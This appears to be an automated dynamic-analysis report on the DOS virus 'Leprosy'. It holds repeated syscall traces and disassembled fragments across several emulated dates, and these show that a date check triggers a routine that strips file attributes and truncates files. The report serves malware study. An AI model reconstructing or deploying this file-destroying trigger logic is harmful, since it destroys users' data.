Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.47857.a


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:26:02.863653346Z 48 PC: 12b38 | Get DOS version
2018-12-17T22:26:02.866021846Z 44 PC: 12b40 | Get time
0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-17T22:26:02.868759703Z 26 PC: 12b4b | Set disk transfer address
2018-12-17T22:26:02.870366504Z 25 PC: 12b4f | Get default drive
2018-12-17T22:26:02.87221479Z 71 PC: 12b5a | Get current directory
2018-12-17T22:26:02.876189818Z 59 PC: 12b61 | Change current directory
2018-12-17T22:26:02.881427294Z 78 PC: 12b6b | Find first file
2018-12-17T22:26:02.893741591Z 87 PC: 12c4f | Get or set file date and time
2018-12-17T22:26:02.897374877Z 67 PC: 12c5b | Get or set file attributes
2018-12-17T22:26:02.899555461Z 59 PC: 12c62 | Change current directory
2018-12-17T22:26:02.904330516Z 59 PC: 12c69 | Change current directory
2018-12-17T22:26:02.907007962Z 42 PC: 12c6d | Get date
0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-17T22:26:02.909633601Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4615,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:24.927690169Z 48 PC: 12b38 | Get DOS version
2018-12-25T11:52:24.929254991Z 44 PC: 12b40 | Get time
0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-25T11:52:24.931115781Z 26 PC: 12b4b | Set disk transfer address
2018-12-25T11:52:24.932402124Z 25 PC: 12b4f | Get default drive
2018-12-25T11:52:24.934439508Z 71 PC: 12b5a | Get current directory
2018-12-25T11:52:24.939836994Z 59 PC: 12b61 | Change current directory
2018-12-25T11:52:24.945870546Z 78 PC: 12b6b | Find first file
2018-12-25T11:52:24.952169123Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T11:52:24.956209619Z 67 PC: 12c5b | Get or set file attributes
2018-12-25T11:52:24.958477889Z 59 PC: 12c62 | Change current directory
2018-12-25T11:52:24.962394387Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:24.964015054Z 42 PC: 12c6d | Get date
0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-25T11:52:24.96644679Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4615,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:25.086379651Z 48 PC: 12b38 | Get DOS version
2018-12-25T11:52:25.088282228Z 44 PC: 12b40 | Get time
0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-25T11:52:25.090636122Z 26 PC: 12b4b | Set disk transfer address
2018-12-25T11:52:25.091728046Z 25 PC: 12b4f | Get default drive
2018-12-25T11:52:25.092865899Z 71 PC: 12b5a | Get current directory
2018-12-25T11:52:25.099153536Z 59 PC: 12b61 | Change current directory
2018-12-25T11:52:25.103529463Z 78 PC: 12b6b | Find first file
2018-12-25T11:52:25.109903184Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T11:52:25.112190749Z 67 PC: 12c5b | Get or set file attributes
2018-12-25T11:52:25.11405074Z 59 PC: 12c62 | Change current directory
2018-12-25T11:52:25.118544157Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:25.121254641Z 42 PC: 12c6d | Get date
0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-25T11:52:25.124000932Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4615,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:25.210141284Z 48 PC: 12b38 | Get DOS version
2018-12-25T11:52:25.212634348Z 44 PC: 12b40 | Get time
0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-25T11:52:25.215010641Z 26 PC: 12b4b | Set disk transfer address
2018-12-25T11:52:25.216099256Z 25 PC: 12b4f | Get default drive
2018-12-25T11:52:25.217214283Z 71 PC: 12b5a | Get current directory
2018-12-25T11:52:25.220211751Z 59 PC: 12b61 | Change current directory
2018-12-25T11:52:25.224246633Z 78 PC: 12b6b | Find first file
2018-12-25T11:52:25.230341471Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T11:52:25.232256939Z 67 PC: 12c5b | Get or set file attributes
2018-12-25T11:52:25.23404627Z 59 PC: 12c62 | Change current directory
2018-12-25T11:52:25.238419008Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:25.241277679Z 42 PC: 12c6d | Get date
0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-25T11:52:25.245212912Z 26 PC: 12c83 | Set disk transfer address
2018-12-25T11:52:25.247085675Z 78 PC: 12c8d | Find first file
2018-12-25T11:52:25.263069916Z 67 PC: 12c96 | Get or set file attributes
2018-12-25T11:52:25.273867162Z 60 PC: 12c9d | Create or truncate file
2018-12-25T11:52:27.060851215Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:27.064343046Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:27.657347994Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:27.824491669Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:27.828311514Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:28.298543585Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:28.903826981Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:28.907664136Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.016698442Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.156887984Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.169666502Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.185082318Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.19944993Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.202612365Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.214330645Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.227789139Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.230832164Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.244315182Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.258492462Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.261686282Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.273278642Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.286981806Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.29001058Z 67 PC: 12c96 | Get or set file attributes (See above)
2018-12-25T11:52:29.30821164Z 60 PC: 12c9d | Create or truncate file (See above)
2018-12-25T11:52:29.317880138Z 79 PC: 12c8d | Find next file (See above)
2018-12-25T11:52:29.320395383Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":4615,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:52:25.429879894Z 48 PC: 12b38 | Get DOS version
2018-12-25T11:52:25.432160731Z 44 PC: 12b40 | Get time
0x12b40: mov byte ptr [0x103], dl
0x12b44: mov dx, 0x148
0x12b47: mov ah, 0x1a
0x12b49: int 0x21
0x12b4b: mov ah, 0x19
0x12b4d: int 0x21
0x12b4f: mov dl, al
0x12b51: inc dl
0x12b53: mov ah, 0x47
0x12b55: mov si, 0x1a7
0x12b58: int 0x21
0x12b5a: mov dx, 0x146
0x12b5d: mov ah, 0x3b
0x12b5f: int 0x21
0x12b61: mov cx, 0x13
0x12b64: mov dx, 0x13a
0x12b67: mov ah, 0x4e
0x12b69: int 0x21
0x12b6b: cmp ax, 0x12
0x12b6e: jne 0x12b73
2018-12-25T11:52:25.433860553Z 26 PC: 12b4b | Set disk transfer address
2018-12-25T11:52:25.43481627Z 25 PC: 12b4f | Get default drive
2018-12-25T11:52:25.447841696Z 71 PC: 12b5a | Get current directory
2018-12-25T11:52:25.450900874Z 59 PC: 12b61 | Change current directory
2018-12-25T11:52:25.454814718Z 78 PC: 12b6b | Find first file
2018-12-25T11:52:25.460905837Z 87 PC: 12c4f | Get or set file date and time
2018-12-25T11:52:25.462052587Z 67 PC: 12c5b | Get or set file attributes
2018-12-25T11:52:25.463337083Z 59 PC: 12c62 | Change current directory
2018-12-25T11:52:25.474266908Z 59 PC: 12c69 | Change current directory
2018-12-25T11:52:25.475947907Z 42 PC: 12c6d | Get date
0x12c6d: cmp cx, 0x7c7
0x12c71: jb 0x12ca3
0x12c73: cmp dl, 0x19
0x12c76: jb 0x12ca3
0x12c78: cmp al, 5
0x12c7a: jne 0x12ca3
0x12c7c: mov dx, 0x148
0x12c7f: mov ah, 0x1a
0x12c81: int 0x21
0x12c83: mov ah, 0x4e
0x12c85: mov cx, 7
0x12c88: mov dx, 0x142
0x12c8b: int 0x21
0x12c8d: jb 0x12ca3
0x12c8f: mov ax, 0x4301
0x12c92: xor cx, cx
0x12c94: int 0x21
0x12c96: mov dx, 0x166
0x12c99: mov ah, 0x3c
0x12c9b: int 0x21
2018-12-25T11:52:25.477962833Z 76 PC: 12ca8 | Terminate with return code (Return code = '0')